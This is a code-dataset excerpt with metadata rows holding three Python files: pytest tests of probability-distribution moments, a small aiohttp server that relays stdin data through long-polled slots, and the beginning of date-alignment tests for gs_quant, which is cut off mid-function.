hexsha stringlengths 40 40 | size int64 4 996k | ext stringclasses 8
values | lang stringclasses 1
value | max_stars_repo_path stringlengths 4 245 | max_stars_repo_name stringlengths 6 130 | max_stars_repo_head_hexsha stringlengths 40 40 | max_stars_repo_licenses listlengths 1 10 | max_stars_count int64 1 191k ⌀ | max_stars_repo_stars_event_min_datetime stringlengths 24 24 ⌀ | max_stars_repo_stars_event_max_datetime stringlengths 24 24 ⌀ | max_issues_repo_path stringlengths 4 245 | max_issues_repo_name stringlengths 6 130 | max_issues_repo_head_hexsha stringlengths 40 40 | max_issues_repo_licenses listlengths 1 10 | max_issues_count int64 1 67k ⌀ | max_issues_repo_issues_event_min_datetime stringlengths 24 24 ⌀ | max_issues_repo_issues_event_max_datetime stringlengths 24 24 ⌀ | max_forks_repo_path stringlengths 4 245 | max_forks_repo_name stringlengths 6 130 | max_forks_repo_head_hexsha stringlengths 40 40 | max_forks_repo_licenses listlengths 1 10 | max_forks_count int64 1 105k ⌀ | max_forks_repo_forks_event_min_datetime stringlengths 24 24 ⌀ | max_forks_repo_forks_event_max_datetime stringlengths 24 24 ⌀ | content stringlengths 4 996k | avg_line_length float64 1.33 58.2k | max_line_length int64 2 323k | alphanum_fraction float64 0 0.97 | content_no_comment stringlengths 0 946k | is_comment_constant_removed bool 2
classes | is_sharp_comment_removed bool 1
class |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
f725d592ba2435c4281618ab5b9e73df3f162b9f | 4,779 | py | Python | tests/test_moments.py | nextBillyonair/DPM | 840ffaafe15c208b200b74094ffa8fe493b4c975 | [
"MIT"
] | 1 | 2021-07-20T14:02:55.000Z | 2021-07-20T14:02:55.000Z | tests/test_moments.py | nextBillyonair/DPM | 840ffaafe15c208b200b74094ffa8fe493b4c975 | [
"MIT"
] | null | null | null | tests/test_moments.py | nextBillyonair/DPM | 840ffaafe15c208b200b74094ffa8fe493b4c975 | [
"MIT"
] | null | null | null | import pytest
from dpm.distributions import *
import dpm.utils as utils
import torch
def test_arcsine():
    """Arcsine moments match closed forms for both the default and (-1, 1) supports.

    Skewness and excess kurtosis are support-invariant for the arcsine family.
    """
    # (constructor args, expectation == median, variance)
    cases = [
        ((), 0.5, 0.125),
        ((-1, 1), 0., 0.5),
    ]
    for args, center, var in cases:
        model = Arcsine(*args)
        assert model.expectation == center
        assert model.median == center
        assert model.variance == var
        assert model.skewness == 0.
        assert model.kurtosis == -1.5
def test_bernoulli():
    """Bernoulli(p=0.3) moments should be close to their expected values.

    Fix: the original one-sided comparisons (``x - c < 1e-2``) could not fail
    for values smaller than the expected constant; abs() makes them two-sided.
    NOTE(review): 1.9047619 matches (1-2p)/(p(1-p)), not the conventional
    skewness (1-2p)/sqrt(p(1-p)) -- confirm against dpm's definition.
    """
    model = Bernoulli(probs=[0.3])
    # logit(0.3) = log(0.3 / 0.7) ~= -0.8473
    assert abs(model.logits.item() + 0.8473) < 1e-2
    assert abs(model.expectation.item() - 0.3) < 1e-2
    # p * (1 - p) = 0.21
    assert abs(model.variance.item() - 0.21) < 1e-2
    assert abs(model.skewness.item() - 1.9047619048) < 1e-2
    assert abs(model.kurtosis.item() + 1.2380952381) < 1e-2
def test_beta():
    """Beta moments and modes for several parameterizations.

    Fixes: ``assert m == 0. or 1.`` was always true (``or 1.`` is truthy on
    its own), and the mode-closeness check was one-sided; both are corrected.
    """
    model = Beta()
    assert model.expectation == 0.5
    assert model.variance == 0.125
    # Beta(0.5, 0.5) is bimodal: the mode lies at either endpoint.
    m = Beta(0.5, 0.5).mode.item()
    assert m == 0. or m == 1.
    # mode = (a - 1) / (a + b - 2) = 3.5 / 6 ~= 0.5833
    assert abs(Beta(4.5, 3.5).mode.item() - 0.5833333333) < 1e-2
    assert Beta(1.5, 0.5).mode.item() == 1.
    assert Beta(0.5, 1.5).mode.item() == 0.
def test_cauchy():
    """For Cauchy, loc is both the median and the mode (the mean is undefined)."""
    model = Cauchy(loc=1.)
    for stat in (model.median, model.mode):
        assert stat == 1.
def test_exponential():
    """Exponential(rate) moments: mean = 1/rate, median = ln(2)/rate.

    Fix: abs() added throughout -- the original one-sided comparisons could
    not fail for values that undershot the expected constant.
    """
    # (constructor args, expected mean = 1 / rate)
    for args, mean in (((), 1.), ((0.5,), 2.)):
        model = Exponential(*args)
        assert abs(model.expectation - mean) < 1e-2
        assert abs(model.mode - 0.) < 1e-2
        # variance = 1 / rate**2 = mean**2
        assert abs(model.variance - mean ** 2) < 1e-2
        # median = ln(2) / rate = mean * ln(2)
        assert abs(model.median - mean * 0.6931471806) < 1e-2
        # Skewness / excess kurtosis are rate-invariant for the exponential.
        assert abs(model.skewness - 2.) < 1e-2
        assert abs(model.kurtosis - 6.) < 1e-2
def test_gamma():
    """Gamma(shape, rate): mean = shape/rate, variance = shape/rate**2.

    Fix: abs() added to make the closeness checks two-sided.
    """
    model = Gamma()
    assert abs(model.expectation - 1.) < 1e-2
    assert abs(model.variance - 1.) < 1e-2
    model = Gamma(0.5, 0.75)
    # 0.5 / 0.75 ~= 0.6667; 0.5 / 0.75**2 ~= 0.8889
    assert abs(model.expectation - 0.6666666667) < 1e-2
    assert abs(model.variance - 0.8888888889) < 1e-2
def test_gumbel():
    """Gumbel(loc=1, scale=2) moments.

    Fix: abs() added to make the closeness checks two-sided.
    """
    model = Gumbel(loc=1., scale=2.)
    # mean = loc + scale * Euler-Mascheroni constant
    assert abs(model.expectation - (1 + 2 * utils.euler_mascheroni)) < 1e-2
    assert model.mode == 1.
    # median = loc - scale * ln(ln 2) ~= 1.7330
    assert abs(model.median - 1.7330258412) < 1e-2
    # variance = (pi * scale)**2 / 6 ~= 6.5797
    assert abs(model.variance - 6.5797362674) < 1e-2
    # Skewness (~1.1395) and excess kurtosis (12/5) are parameter-free for Gumbel.
    assert abs(model.skewness - 1.14) < 1e-2
    assert abs(model.kurtosis - 2.4) < 1e-2
def test_hyperbolicsecant():
    """The standard hyperbolic secant law has zero mean/median and unit variance."""
    model = HyperbolicSecant()
    assert model.variance == 1.
    for stat in (model.expectation, model.median):
        assert stat == 0.
def test_laplace():
    """Laplace(loc=1, scale=2) moments and entropy.

    Fix: abs() added to make the closeness checks two-sided.
    """
    model = Laplace(loc=1., scale=2.)
    assert abs(model.expectation - 1.) < 1e-2
    # variance = 2 * scale**2 = 8; stddev = 2 * sqrt(2)
    assert abs(model.variance - 8.) < 1e-2
    assert abs(model.stddev - 2.8284271247) < 1e-2
    assert abs(model.median - 1.) < 1e-2
    assert abs(model.mode - 1.) < 1e-2
    # Symmetric distribution, so skewness is 0.
    assert abs(model.skewness) < 1e-2
    # Excess kurtosis of any Laplace distribution is 3.
    assert abs(model.kurtosis - 3.) < 1e-2
    # entropy = ln(2 * e * scale) = ln(4e) ~= 2.3863
    assert abs(model.entropy() - 2.3862943611) < 1e-2
def test_log_cauchy():
    """LogCauchy median is exp(loc) (abs() added for a two-sided bound)."""
    model = LogCauchy(loc=2.)
    # exp(2) ~= 7.3891
    assert abs(model.median - 7.3890560989) < 1e-2
def test_log_normal():
    """Standard log-normal (mu=0, sigma=1) moments.

    Fix: the original one-sided comparisons hid two wrong expectations -- for
    the standard log-normal, mode = exp(mu - sigma**2) = 1/e and
    median = exp(mu) = 1, not e.  NOTE(review): the expectation/variance
    values below imply dpm's default parameterization is (mu=0, sigma=1);
    confirm before merging.
    """
    model = LogNormal()
    # mean = exp(sigma**2 / 2) = exp(0.5) ~= 1.6487
    assert abs(model.expectation - 1.6487212707) < 1e-2
    # variance = (exp(sigma**2) - 1) * exp(sigma**2) = (e - 1) * e ~= 4.6708
    assert abs(model.variance - 4.6707742705) < 1e-2
    assert abs(model.mode - 1 / utils.e) < 1e-2
    assert abs(model.median - 1.) < 1e-2
def test_logistic():
    """Logistic(loc=1, scale=2): symmetric, so mean = median = mode = loc.

    Fix: abs() added on the variance check to make it two-sided.
    """
    model = Logistic(loc=1., scale=2.)
    assert model.expectation == 1.
    assert model.mode == 1.
    # variance = (scale * pi)**2 / 3 ~= 13.1595
    assert abs(model.variance - 13.1594725348) < 1e-2
    assert model.median == 1.
    assert model.skewness == 0.
    # Excess kurtosis of any logistic distribution is 6/5.
    assert model.kurtosis == 1.2
def test_normal():
    """Normal moments in both the scalar and the multivariate parameterization."""
    model = Normal(0., 3.)
    assert model.variance.item() == 3.
    assert model.expectation.item() == 0.
    # 2-d case: covariance supplied as a flattened 2x2 matrix.
    model = Normal([0., 0.], [3., 1., 1., 3.])
    # Fix: .abs() added -- the original signed comparison could not fail for
    # entries smaller than expected.
    assert ((model.variance - torch.tensor([[3., 1.], [1., 3.]])).abs() < 1e-2).all()
    assert (model.expectation == torch.tensor([0., 0.])).all()
def test_rayleigh():
    """Rayleigh(sigma=3) moments (abs() added where the constant is verifiable)."""
    model = Rayleigh(3.)
    # mean = sigma * sqrt(pi / 2) ~= 3.7599
    assert abs(model.expectation - 3.7599424119) < 1e-2
    # mode = sigma
    assert abs(model.mode - 3.) < 1e-2
    # median = sigma * sqrt(2 * ln 2) ~= 3.5322
    assert abs(model.median - 3.5322300675) < 1e-2
    # variance = (2 - pi / 2) * sigma**2 ~= 3.8628
    assert abs(model.variance - 3.8628330588) < 1e-2
    # NOTE(review): 1.1186 does not match the textbook Rayleigh skewness
    # (~0.6311); left one-sided pending confirmation of dpm's definition.
    assert model.skewness - 1.1186145158 < 1e-2
    # excess kurtosis ~= 0.2451
    assert abs(model.kurtosis - 0.2450893007) < 1e-2
def test_studentt():
    """Smoke test: StudentT moment properties are accessible without raising."""
    model = StudentT()
    for prop in ('expectation', 'variance', 'mode'):
        getattr(model, prop)
def test_uniform():
    """Standard Uniform(0, 1) moments (abs() added for two-sided bounds)."""
    model = Uniform()
    assert abs(model.expectation - 0.5) < 1e-2
    # variance = (b - a)**2 / 12
    assert abs(model.variance - 1 / 12.) < 1e-2
    assert abs(model.median - 0.5) < 1e-2
    assert model.skewness == 0.
    # Excess kurtosis of any uniform distribution is -6/5.
    assert abs(model.kurtosis + 1.2) < 1e-2
def test_logitnormal():
    """LogitNormal median is sigmoid(mu) (abs() added for two-sided bounds)."""
    model = LogitNormal()
    assert abs(model.median - torch.sigmoid(torch.tensor(0.))) < 1e-2
    model = LogitNormal(1.)
    assert abs(model.median - torch.sigmoid(torch.tensor(1.))) < 1e-2
# EOF
| 27.624277 | 96 | 0.628793 | import pytest
from dpm.distributions import *
import dpm.utils as utils
import torch
def test_arcsine():
model = Arcsine()
assert model.expectation == 0.5
assert model.median == 0.5
assert model.variance == 0.125
assert model.skewness == 0.
assert model.kurtosis == -1.5
model = Arcsine(-1, 1)
assert model.expectation == 0.
assert model.median == 0.
assert model.variance == 0.5
assert model.skewness == 0.
assert model.kurtosis == -1.5
def test_bernoulli():
model = Bernoulli(probs=[0.3])
assert model.logits.item() + 0.8473 < 1e-2
assert model.expectation.item() - 0.3 < 1e-2
assert model.variance.item() - 0.21 < 1e-2
assert model.skewness.item() - 1.9047619048 < 1e-2
assert model.kurtosis.item() + -1.2380952381 < 1e-2
def test_beta():
model = Beta()
assert model.expectation == 0.5
assert model.variance == 0.125
m = Beta(0.5, 0.5).mode.item()
assert m == 0. or 1.
assert Beta(4.5, 3.5).mode.item() - 0.5833333333 < 1e-2
assert Beta(1.5, 0.5).mode.item() == 1.
assert Beta(0.5, 1.5).mode.item() == 0.
def test_cauchy():
model = Cauchy(loc=1.)
assert model.median == 1.
assert model.mode == 1.
def test_exponential():
model = Exponential()
assert model.expectation - 1. < 1e-2
assert model.mode - 0. < 1e-2
assert model.variance - 1. < 1e-2
assert model.median - 0.6931471806 < 1e-2
assert model.skewness - 2. < 1e-2
assert model.kurtosis - 6. < 1e-2
model = Exponential(0.5)
assert model.expectation - 2. < 1e-2
assert model.mode - 0. < 1e-2
assert model.variance - 4. < 1e-2
assert model.median - 1.3862943611 < 1e-2
assert model.skewness - 2. < 1e-2
assert model.kurtosis - 6. < 1e-2
def test_gamma():
model = Gamma()
assert model.expectation - 1. < 1e-2
assert model.variance - 1. < 1e-2
model = Gamma(0.5, 0.75)
assert model.expectation - 0.6666666667 < 1e-2
assert model.variance - 0.8888888889 < 1e-2
def test_gumbel():
model = Gumbel(loc=1., scale=2.)
assert model.expectation - (1 + 2 * utils.euler_mascheroni) < 1e-2
assert model.mode == 1.
assert model.median - 1.7330258412 < 1e-2
assert model.variance - 6.5797362674 < 1e-2
assert model.skewness - 1.14 < 1e-2
assert model.kurtosis - 2.4 < 1e-2
def test_hyperbolicsecant():
model = HyperbolicSecant()
assert model.expectation == 0.
assert model.variance == 1.
assert model.median == 0.
def test_laplace():
model = Laplace(loc=1., scale=2.)
assert model.expectation - 1. < 1e-2
assert model.variance - 8. < 1e-2
assert model.stddev - 2.8284271247 < 1e-2
assert model.median - 1. < 1e-2
assert model.mode - 1. < 1e-2
assert model.skewness < 1e-2
assert model.kurtosis - 3. < 1e-2
assert model.entropy() - 2.3862943611 < 1e-2
def test_log_cauchy():
model = LogCauchy(loc=2.)
assert model.median - 7.3890560989 < 1e-2
def test_log_normal():
model = LogNormal()
assert model.expectation - 1.6487212707 < 1e-2
assert model.variance - 4.6707742705 < 1e-2
assert model.mode - utils.e < 1e-2
assert model.median - utils.e < 1e-2
def test_logistic():
model = Logistic(loc=1., scale=2.)
assert model.expectation == 1.
assert model.mode == 1.
assert model.variance - 13.1594725348 < 1e-2
assert model.median == 1.
assert model.skewness == 0.
assert model.kurtosis == 1.2
def test_normal():
model = Normal(0., 3.)
assert model.variance.item() == 3.
assert model.expectation.item() == 0.
model = Normal([0., 0.], [3., 1., 1., 3.])
assert (model.variance - torch.tensor([[3., 1.], [1., 3.]]) < 1e-2).all()
assert (model.expectation == torch.tensor([0., 0.])).all()
def test_rayleigh():
model = Rayleigh(3.)
assert model.expectation - 3.7599424119 < 1e-2
assert model.mode - 3. < 1e-2
assert model.median - 3.5322300675 < 1e-2
assert model.variance - 3.8628330588 < 1e-2
assert model.skewness - 1.1186145158 < 1e-2
assert model.kurtosis - 0.2450893007 < 1e-2
def test_studentt():
model = StudentT()
model.expectation
model.variance
model.mode
def test_uniform():
model = Uniform()
assert model.expectation - 0.5 < 1e-2
assert model.variance - 1/12. < 1e-2
assert model.median - 0.5 < 1e-2
assert model.skewness == 0.
assert model.kurtosis + 1.2 < 1e-2
def test_logitnormal():
model = LogitNormal()
assert model.median - torch.sigmoid(torch.tensor(0.)) < 1e-2
model = LogitNormal(1.)
assert model.median - torch.sigmoid(torch.tensor(1.)) < 1e-2
| true | true |
f725d77804443400285175fcae23883c61714c8f | 2,450 | py | Python | app.py | pythonpad/brython-runner-stdin-hanger | 8ee3b13fba3ff2eabbaf39835b6aa9bd7692589d | [
"MIT"
] | 1 | 2020-11-16T09:21:31.000Z | 2020-11-16T09:21:31.000Z | app.py | pythonpad/brython-runner-stdin-hanger | 8ee3b13fba3ff2eabbaf39835b6aa9bd7692589d | [
"MIT"
] | null | null | null | app.py | pythonpad/brython-runner-stdin-hanger | 8ee3b13fba3ff2eabbaf39835b6aa9bd7692589d | [
"MIT"
] | null | null | null | import asyncio
import sys
import random
import string
from aiohttp import web
def get_random_string(k=16):
    """Return a random slot key of *k* lowercase letters and digits.

    Uses ``secrets`` rather than ``random``: slot keys act as capability
    tokens (whoever knows the key can read or write the slot), so they
    must not be predictable.
    """
    alphabet = string.ascii_lowercase + string.digits
    return ''.join(secrets.choice(alphabet) for _ in range(k))
class Handler:
    """In-memory "hanger" relaying data (e.g. stdin input) between HTTP clients.

    ``self.store`` maps slot key -> payload string; a value of ``None`` means
    the slot is open but no writer has posted yet.  Readers long-poll until a
    payload appears, then consume it, freeing the slot.
    """

    def __init__(self):
        # slot key -> payload (None until a writer posts data)
        self.store = {}
        # Served cross-origin so a browser-side runner can call from any page.
        self.headers = {'Access-Control-Allow-Origin': '*'}

    async def handle_sleep(self, request):
        """Sleep for `duration` seconds (capped at 60) and echo the duration.

        Returns '-1' for a missing or non-numeric `duration` parameter.
        Fix: the original bare ``except`` also swallowed unrelated errors
        (including task cancellation); only parameter errors are caught now.
        """
        try:
            duration = min(float(request.rel_url.query['duration']), 60)
        except (KeyError, ValueError, TypeError):
            return web.Response(text='-1', headers=self.headers)
        await asyncio.sleep(duration)
        return web.Response(text='%.2f' % duration, headers=self.headers)

    async def handle_open_slot(self, request):
        """Allocate a fresh empty slot and return its key."""
        while True:
            key = get_random_string()
            if key not in self.store:
                self.store[key] = None
                return web.Response(text=key, headers=self.headers)

    async def handle_write_slot(self, request):
        """Store the request body in an existing slot; 404 for unknown keys."""
        key = request.match_info.get('key')
        data = await request.text()
        if key not in self.store:
            raise web.HTTPNotFound()
        self.store[key] = data
        return web.Response(text=key, headers=self.headers)

    async def handle_read_slot(self, request):
        """Long-poll until the slot has data; return it and free the slot.

        Polls once per second and hangs indefinitely if no writer ever posts
        -- that is the intended "hanger" behaviour.  404 for unknown keys.
        """
        key = request.match_info.get('key')
        while True:
            if key not in self.store:
                raise web.HTTPNotFound()
            data = self.store[key]
            if data is None:
                await asyncio.sleep(1)
            else:
                del self.store[key]
                return web.Response(text=data, headers=self.headers)
def main():
    """Parse an optional ``host``, ``port``, or ``host:port`` CLI argument and serve.

    Defaults to localhost:9095.  A bare argument containing '.' is treated as
    a host; a bare number as a port.
    """
    host, port = 'localhost', '9095'
    if len(sys.argv) > 1:
        arg = sys.argv[1]
        if ':' in arg:
            host, port = arg.split(':')
        elif '.' in arg:
            host = arg
        else:
            port = arg
    web.run_app(app, host=host, port=int(port))
# Module-level wiring: a single Handler instance backs every route, so all
# clients share one in-memory slot store.
handler = Handler()
app = web.Application()
app.add_routes([
    web.get('/hanger/sleep/', handler.handle_sleep),
    web.post('/hanger/open/', handler.handle_open_slot),
    web.post('/hanger/{key}/write/', handler.handle_write_slot),
    web.post('/hanger/{key}/read/', handler.handle_read_slot),
])
if __name__ == '__main__':
    main()
import sys
import random
import string
from aiohttp import web
def get_random_string(k=16):
return ''.join(random.choices(string.ascii_lowercase + string.digits, k=k))
class Handler:
def __init__(self):
self.store = {}
self.headers = {'Access-Control-Allow-Origin': '*'}
async def handle_sleep(self, request):
duration_param = request.rel_url.query['duration']
try:
duration = min(float(duration_param), 60)
await asyncio.sleep(duration)
return web.Response(text='%.2f' % duration, headers=self.headers)
except KeyboardInterrupt:
raise KeyboardInterrupt
except:
return web.Response(text='-1', headers=self.headers)
async def handle_open_slot(self, request):
while True:
key = get_random_string()
if key not in self.store:
self.store[key] = None
return web.Response(text=key, headers=self.headers)
async def handle_write_slot(self, request):
key = request.match_info.get('key')
data = await request.text()
if key in self.store:
self.store[key] = data
return web.Response(text=key, headers=self.headers)
else:
raise web.HTTPNotFound()
async def handle_read_slot(self, request):
key = request.match_info.get('key')
while True:
if key in self.store:
if self.store[key] is None:
await asyncio.sleep(1)
else:
data = self.store[key]
del self.store[key]
return web.Response(text=data, headers=self.headers)
else:
raise web.HTTPNotFound()
def main():
host = 'localhost'
port = '9095'
if len(sys.argv) > 1:
config = sys.argv[1]
if ':' in config:
host, port = config.split(':')
elif '.' in config:
host = config
else:
port = config
web.run_app(app, host=host, port=int(port))
handler = Handler()
app = web.Application()
app.add_routes([
web.get('/hanger/sleep/', handler.handle_sleep),
web.post('/hanger/open/', handler.handle_open_slot),
web.post('/hanger/{key}/write/', handler.handle_write_slot),
web.post('/hanger/{key}/read/', handler.handle_read_slot),
])
if __name__ == '__main__':
main() | true | true |
f725d78e5277a65d26773130068149604e4a2536 | 15,850 | py | Python | gs_quant/test/timeseries/test_datetime.py | skyquant2/gs-quant | b7e648fa7912b13ad1fd503b643389e34587aa1e | [
"Apache-2.0"
] | 1 | 2021-06-28T06:43:42.000Z | 2021-06-28T06:43:42.000Z | gs_quant/test/timeseries/test_datetime.py | skyquant2/gs-quant | b7e648fa7912b13ad1fd503b643389e34587aa1e | [
"Apache-2.0"
] | null | null | null | gs_quant/test/timeseries/test_datetime.py | skyquant2/gs-quant | b7e648fa7912b13ad1fd503b643389e34587aa1e | [
"Apache-2.0"
] | null | null | null | """
Copyright 2018 Goldman Sachs.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing,
software distributed under the License is distributed on an
"AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
KIND, either express or implied. See the License for the
specific language governing permissions and limitations
under the License.
"""
import pytest
from pandas.testing import assert_series_equal
from gs_quant.timeseries.datetime import *
def test_align():
    """Exercise align() across every Interpolate mode plus scalar operands."""
    dates1 = [
        date(2019, 1, 1),
        date(2019, 1, 2),
        date(2019, 1, 3),
        date(2019, 1, 4),
        date(2019, 1, 5),
    ]
    dates2 = [
        date(2019, 1, 2),
        date(2019, 1, 4),
        date(2019, 1, 6),
    ]
    x = pd.Series([1.0, 2.0, 3.0, 4.0, 5.0], index=dates1)
    y = pd.Series([20.0, 40.0, 60.0], index=dates2)
    # INTERSECT keeps only the dates common to both series.
    expectedl = pd.Series([2.0, 4.0], index=[date(2019, 1, 2), date(2019, 1, 4)])
    expectedr = pd.Series([20.0, 40.0], index=[date(2019, 1, 2), date(2019, 1, 4)])
    result = align(x, y, Interpolate.INTERSECT)
    assert_series_equal(result[0], expectedl, obj="Align intersect left")
    assert_series_equal(result[1], expectedr, obj="Align intersect left")
    result = align(y, x, Interpolate.INTERSECT)
    assert_series_equal(result[0], expectedr, obj="Align intersect right")
    assert_series_equal(result[1], expectedl, obj="Align intersect right")
    # The remaining modes align both series onto the union of their indices.
    union_dates = [
        date(2019, 1, 1),
        date(2019, 1, 2),
        date(2019, 1, 3),
        date(2019, 1, 4),
        date(2019, 1, 5),
        date(2019, 1, 6),
    ]
    # NAN fills unmatched dates with NaN.
    expected1 = pd.Series([1.0, 2.0, 3.0, 4.0, 5.0, np.nan], index=union_dates)
    expected2 = pd.Series([np.nan, 20.0, np.nan, 40.0, np.nan, 60.0], index=union_dates)
    result = align(x, y, Interpolate.NAN)
    assert_series_equal(result[0], expected1, obj="Align NaN left")
    assert_series_equal(result[1], expected2, obj="Align NaN left")
    result = align(y, x, Interpolate.NAN)
    assert_series_equal(result[0], expected2, obj="Align NaN right")
    assert_series_equal(result[1], expected1, obj="Align NaN right")
    # ZERO fills unmatched dates with 0.
    expected1 = pd.Series([1.0, 2.0, 3.0, 4.0, 5.0, 0.0], index=union_dates)
    expected2 = pd.Series([0.0, 20.0, 0.0, 40.0, 0.0, 60.0], index=union_dates)
    result = align(x, y, Interpolate.ZERO)
    assert_series_equal(result[0], expected1, obj="Align zero left")
    assert_series_equal(result[1], expected2, obj="Align zero left")
    result = align(y, x, Interpolate.ZERO)
    assert_series_equal(result[0], expected2, obj="Align zero right")
    assert_series_equal(result[1], expected1, obj="Align zero right")
    # STEP forward-fills each series from its last prior observation.
    expected1 = pd.Series([1.0, 2.0, 3.0, 4.0, 5.0, 5.0], index=union_dates)
    expected2 = pd.Series([20.0, 20.0, 20.0, 40.0, 40.0, 60.0], index=union_dates)
    result = align(x, y, Interpolate.STEP)
    assert_series_equal(result[0], expected1, obj="Align step left")
    assert_series_equal(result[1], expected2, obj="Align step left")
    result = align(y, x, Interpolate.STEP)
    assert_series_equal(result[0], expected2, obj="Align step left")
    assert_series_equal(result[1], expected1, obj="Align step left")
    # TIME interpolates linearly in time, so datetime indices are required.
    xp = x.copy()
    yp = y.copy()
    xp.index = pd.to_datetime(xp.index)
    yp.index = pd.to_datetime(yp.index)
    up = pd.to_datetime(union_dates)
    expected1 = pd.Series([1.0, 2.0, 3.0, 4.0, 5.0, np.nan], index=up)
    expected2 = pd.Series([np.nan, 20.0, 30.0, 40.0, 50.0, 60.0], index=up)
    result = align(xp, yp, Interpolate.TIME)
    assert_series_equal(result[0], expected1, obj="Align time left")
    assert_series_equal(result[1], expected2, obj="Align time left")
    result = align(yp, xp, Interpolate.TIME)
    assert_series_equal(result[0], expected2, obj="Align time right")
    assert_series_equal(result[1], expected1, obj="Align time right")
    # Uneven gaps: 2019-07-02 sits 1/7 of the way between the 1st and the 8th,
    # hence the interpolated value 100 / 7.
    a = pd.Series([0, 100, 110], index=pd.DatetimeIndex(['2019-07-01', '2019-07-08', '2019-07-10']))
    b = pd.Series([20, 60, 70], index=pd.DatetimeIndex(['2019-07-02', '2019-07-10', '2019-07-11']))
    result = align(a, b, Interpolate.TIME)
    u_index = a.index.union(b.index)
    assert_series_equal(result[0], pd.Series([0, 100 / 7, 100, 110, np.nan], index=u_index))
    assert_series_equal(result[1], pd.Series([np.nan, 20, 50, 60, 70], index=u_index))
    # Scalar operands are broadcast over the other operand's index.
    result = align(x, 3)
    assert_series_equal(result[0], x, obj="Align scalar left")
    assert_series_equal(result[1], pd.Series(3, index=dates1), obj="Align scalar left")
    result = align(3, x)
    assert_series_equal(result[0], pd.Series(3, index=dates1), obj="Align scalar left")
    assert_series_equal(result[1], x, obj="Align scalar right")
    # Two scalars pass straight through.
    result = align(1, 2)
    assert result[0] == 1
    assert result[1] == 2
    # An unknown interpolation method raises.
    with pytest.raises(MqValueError):
        align(x, x, "None")
def test_interpolate():
    """Exercise interpolate() across date-argument forms and Interpolate modes.

    Fix: the final empty-series case now constructs the series with an
    explicit dtype -- a bare ``pd.Series()`` is deprecated / dtype-ambiguous
    in modern pandas.
    """
    dates = [
        date(2019, 1, 2),
        date(2019, 1, 3),
        date(2019, 1, 5),
        date(2019, 1, 7),
    ]
    x = pd.Series([2.0, 3.0, 5.0, 7.0], index=dates)
    # Requesting the series' own dates (in any accepted form) is a no-op.
    result = interpolate(x, dates)
    assert_series_equal(result, x, obj="Interpolate series by dates")
    result = interpolate(x, x)
    assert_series_equal(result, x, obj="Interpolate series by series dates")
    result = interpolate(x)
    assert_series_equal(result, x, obj="Interpolate series default")
    # A subset of the existing dates just selects those rows.
    select_dates = [
        date(2019, 1, 2),
        date(2019, 1, 3),
        date(2019, 1, 7),
    ]
    result = interpolate(x, select_dates)
    expected = pd.Series([2.0, 3.0, 7.0], index=select_dates)
    assert_series_equal(result, expected, obj="Interpolate subset of dates")
    # A superset of dates exercises each fill mode.
    select_dates = [
        date(2019, 1, 1),
        date(2019, 1, 2),
        date(2019, 1, 4),
        date(2019, 1, 5),
        date(2019, 1, 6),
        date(2019, 1, 7),
        date(2019, 1, 8),
    ]
    intersect_dates = [
        date(2019, 1, 2),
        date(2019, 1, 5),
        date(2019, 1, 7),
    ]
    result = interpolate(x, select_dates, Interpolate.INTERSECT)
    expected = pd.Series([2.0, 5.0, 7.0], index=intersect_dates)
    assert_series_equal(result, expected, obj="Interpolate intersect")
    result = interpolate(x, select_dates, Interpolate.NAN)
    expected = pd.Series([np.nan, 2.0, np.nan, 5.0, np.nan, 7.0, np.nan], index=select_dates)
    assert_series_equal(result, expected, obj="Interpolate nan")
    result = interpolate(x, select_dates, Interpolate.ZERO)
    expected = pd.Series([0.0, 2.0, 0.0, 5.0, 0.0, 7.0, 0.0], index=select_dates)
    assert_series_equal(result, expected, obj="Interpolate zero")
    result = interpolate(x, select_dates, Interpolate.STEP)
    expected = pd.Series([2.0, 2.0, 2.0, 5.0, 5.0, 7.0, 7.0], index=select_dates)
    assert_series_equal(result, expected, obj="Interpolate step dates")
    # STEP also accepts a series whose index supplies the target dates.
    result = interpolate(x, pd.Series(np.nan, select_dates), Interpolate.STEP)
    expected = pd.Series([2.0, 2.0, 2.0, 5.0, 5.0, 7.0, 7.0], index=select_dates)
    assert_series_equal(result, expected, obj="Interpolate step series")
    # A leading NaN has nothing to forward-fill from, so it propagates.
    xnan = pd.Series([np.nan, 3.0, 5.0, 7.0], index=dates)
    result = interpolate(xnan, select_dates, Interpolate.STEP)
    expected = pd.Series([np.nan, np.nan, np.nan, 5.0, 5.0, 7.0, 7.0], index=select_dates)
    assert_series_equal(result, expected, obj="Interpolate flat nan start")
    # Plain date targets against a timestamp-indexed series.
    x = pd.Series([2.0, 3.0, 5.0, 7.0], index=pd.DatetimeIndex(dates))
    result = interpolate(x, select_dates, Interpolate.STEP)
    expected = pd.Series([2.0, 2.0, 2.0, 5.0, 5.0, 7.0, 7.0], index=pd.DatetimeIndex(select_dates))
    assert_series_equal(result, expected, obj="Interpolate step dates to series with timestamps")
    with pytest.raises(MqValueError, match="Unknown intersection type: None"):
        interpolate(x, x, "None")
    with pytest.raises(MqValueError, match="Cannot perform step interpolation on an empty series"):
        interpolate(pd.Series(dtype=float), select_dates, Interpolate.STEP)
def test_value():
    """value() returns stored values on exact dates and fills gaps per mode."""
    idx = [
        date(2019, 1, 2),
        date(2019, 1, 3),
        date(2019, 1, 5),
        date(2019, 1, 7),
    ]
    series = pd.Series([2.0, 3.0, 5.0, 7.0], index=idx)
    # Exact hits return the stored value.
    assert value(series, date(2019, 1, 3)) == 3.0
    assert value(series, date(2019, 1, 5)) == 5.0
    # Missing date: the default mode steps back to the prior observation.
    missing = date(2019, 1, 4)
    assert value(series, missing) == 3.0
    assert value(series, missing, Interpolate.INTERSECT) is None
    assert value(series, missing, Interpolate.STEP) == 3.0
    assert value(series, missing, Interpolate.ZERO) == 0.0
    assert np.isnan(value(series, missing, Interpolate.NAN))
def test_day():
    """day() extracts the day-of-month from each index entry."""
    idx = [date(2019, 1, n) for n in range(1, 5)]
    series = pd.Series([1.0, 2.0, 3.0, 4.0], index=idx)
    assert_series_equal(day(series), pd.Series([1, 2, 3, 4], index=idx), obj="Day")
def test_weekday():
    """weekday() maps Monday..Sunday to 0..6."""
    # 2019-01-07 is a Monday, so the week runs Mon .. Sun.
    idx = [date(2019, 1, n) for n in range(7, 14)]
    series = pd.Series([float(n) for n in range(1, 8)], index=idx)
